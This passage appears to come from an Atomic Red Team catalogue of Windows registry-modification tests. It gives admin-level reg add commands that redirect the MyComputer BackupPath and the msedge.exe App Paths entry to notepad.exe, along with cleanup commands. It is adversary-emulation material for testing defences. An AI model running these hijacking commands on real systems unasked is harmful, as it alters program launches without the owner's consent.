reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\BackupPath" /t REG_EXPAND_SZ /d "%systemroot%\system32\notepad.exe" /f
```
#### Cleanup Commands:
```cmd
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\BackupPath" /t REG_EXPAND_SZ /d "%SystemRoot%\system32\sdclt.exe" /f
```
<br/>
<br/>
## Atomic Test #90 - Adding custom paths for application execution
As per Microsoft,the entries found under App Paths are used primarily to map an applications executable file name to that files fully qualified path and to pre-pend information to the PATH environment variable on a per-application, per-process basis.
The path can be modified to load a custom application of choice.
Post the registry changes of this test, when someone tries to manually run msedge.exe via StartMenu/Run window , notepad will be launched.
**Supported Platforms:** Windows
**auto_generated_guid:** 573d15da-c34e-4c59-a7d2-18f20d92dfa3
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| app_name | path of application to be modified | string | msedge.exe|
| new_path | New App Path Added | string | C:&#92;Windows&#92;System32&#92;notepad.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\#{app_name}" /t REG_SZ /d #{new_path} /f
```
#### Cleanup Commands:
```cmd
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\#{app_name}" /v (Default) /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\#{app_name}" /t REG_SZ /d "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /f
```
<br/>
Reference in New Issue View Git Blame Copy Permalink